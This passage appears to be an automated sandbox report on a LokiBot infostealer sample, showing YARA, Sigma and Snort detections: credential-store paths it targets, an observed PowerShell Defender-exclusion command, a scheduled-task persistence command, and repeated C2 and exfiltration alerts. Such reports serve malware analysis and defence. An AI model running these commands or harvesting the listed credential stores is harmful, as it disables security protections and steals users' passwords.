21.2.XxENUzWteJXT.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 37 entries

Sigma Signatures

Exploits

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2740, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.74.191, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2740, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ParentImage: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentProcessId: 2912, ParentProcessName: sharon38892.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", ProcessId: 3128, ProcessName: powershell.exe

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sharon38892.exe, NewProcessName: C:\Users\user\AppData\Roaming\sharon38892.exe, OriginalFileName: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2740, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ProcessId: 2912, ProcessName: sharon38892.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sharon38892.exe, NewProcessName: C:\Users\user\AppData\Roaming\sharon38892.exe, OriginalFileName: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2740, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ProcessId: 2912, ProcessName: sharon38892.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ParentImage: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentProcessId: 2912, ParentProcessName: sharon38892.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", ProcessId: 3204, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2740, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ParentImage: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentProcessId: 2912, ParentProcessName: sharon38892.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe", ProcessId: 3128, ProcessName: powershell.exe

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 200, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3128, TargetFilename: C:\Users\user\AppData\Local\Temp\rj0v3nwa.fbr.ps1

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sharon38892.exe", ParentImage: C:\Users\user\AppData\Roaming\sharon38892.exe, ParentProcessId: 2912, ParentProcessName: sharon38892.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp", ProcessId: 3204, ProcessName: schtasks.exe

Snort Signatures

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:03.316993
SID:	2025381
Source Port:	49245
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:08.863871
SID:	2024318
Source Port:	49251
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:13.398917
SID:	2021641
Source Port:	49256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:16.005968
SID:	2024318
Source Port:	49259
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:16.005968
SID:	2024313
Source Port:	49259
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:35.132025
SID:	2024317
Source Port:	49164
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:51.806006
SID:	2825766
Source Port:	49179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:18.079750
SID:	2024313
Source Port:	49201
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:55.233506
SID:	2025381
Source Port:	49236
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:04.226888
SID:	2825766
Source Port:	49246
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:08.863871
SID:	2024313
Source Port:	49251
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:06.064261
SID:	2024318
Source Port:	49248
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:18.079750
SID:	2024318
Source Port:	49201
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:37.677256
SID:	2021641
Source Port:	49217
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:19:05.135747
SID:	2025381
Source Port:	49247
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:06.064261
SID:	2024313
Source Port:	49248
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:35.132025
SID:	2024312
Source Port:	49164
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:22.772748
SID:	2025381
Source Port:	49206
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:30.098368
SID:	2021641
Source Port:	49214
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:42.120355
SID:	2025381
Source Port:	49169
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:42.915752
SID:	2021641
Source Port:	49223
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:54.073092
SID:	2024313
Source Port:	49181
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:00.429820
SID:	2025381
Source Port:	49242
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:17:50.058542
SID:	2021641
Source Port:	49177
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:39.381191
SID:	2825766
Source Port:	49219
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:45.155201
SID:	2025381
Source Port:	49172
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:00.736741
SID:	2825766
Source Port:	49187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:56.049434
SID:	2825766
Source Port:	49182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:25.484710
SID:	2025381
Source Port:	49209
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:54.073092
SID:	2024318
Source Port:	49181
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:47.441038
SID:	2024313
Source Port:	49228
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:41.210686
SID:	2024318
Source Port:	49221
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:50.061779
SID:	2024313
Source Port:	49231
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:54.312724
SID:	2825766
Source Port:	49235
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:07.989686
SID:	2024318
Source Port:	49194
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:28.376454
SID:	2024313
Source Port:	49212
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:28.376454
SID:	2024318
Source Port:	49212
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:57.792134
SID:	2024313
Source Port:	49239
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:07.989686
SID:	2024313
Source Port:	49194
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:03.278750
SID:	2825766
Source Port:	49190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:44.730541
SID:	2025381
Source Port:	49225
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:18:40.275029
SID:	2021641
Source Port:	49220
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:02.183841
SID:	2025381
Source Port:	49244
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:41.210686
SID:	2024313
Source Port:	49221
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:50.061779
SID:	2024318
Source Port:	49231
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:11.675767
SID:	2825766
Source Port:	49254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:52.694696
SID:	2825766
Source Port:	49180
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:07.888746
SID:	2025381
Source Port:	49250
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:38.077506
SID:	2021641
Source Port:	49166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:17:43.183162
SID:	2825766
Source Port:	49170
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:27.512891
SID:	2021641
Source Port:	49211
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:41.981231
SID:	2021641
Source Port:	49222
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:47.208604
SID:	2021641
Source Port:	49174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:56.984952
SID:	2025381
Source Port:	49183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:58.594043
SID:	2024313
Source Port:	49240
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:48.088333
SID:	2025381
Source Port:	49175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:06.045591
SID:	2024313
Source Port:	49192
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:19.988815
SID:	2024313
Source Port:	49203
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:58.820260
SID:	2025381
Source Port:	49185
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:19.988815
SID:	2024318
Source Port:	49203
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:10.741295
SID:	2025381
Source Port:	49253
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:07.107766
SID:	2825766
Source Port:	49193
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:20.882874
SID:	2024318
Source Port:	49204
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:58.594043
SID:	2024318
Source Port:	49240
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:06.045591
SID:	2024318
Source Port:	49192
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:46.517579
SID:	2021641
Source Port:	49227
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:08.948107
SID:	2021641
Source Port:	49195
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:20.882874
SID:	2024313
Source Port:	49204
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:57.792134
SID:	2024318
Source Port:	49239
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:30.957362
SID:	2825766
Source Port:	49215
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:40.814233
SID:	2025381
Source Port:	49168
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:08.948107
SID:	2825766
Source Port:	49195
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:49.167216
SID:	2025381
Source Port:	49230
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:56.909324
SID:	2025381
Source Port:	49238
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:51.088057
SID:	2025381
Source Port:	49232
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:49.147570
SID:	2025381
Source Port:	49176
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:18.976087
SID:	2021641
Source Port:	49202
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:15.184596
SID:	2021641
Source Port:	49258
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:09.860809
SID:	2025381
Source Port:	49196
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

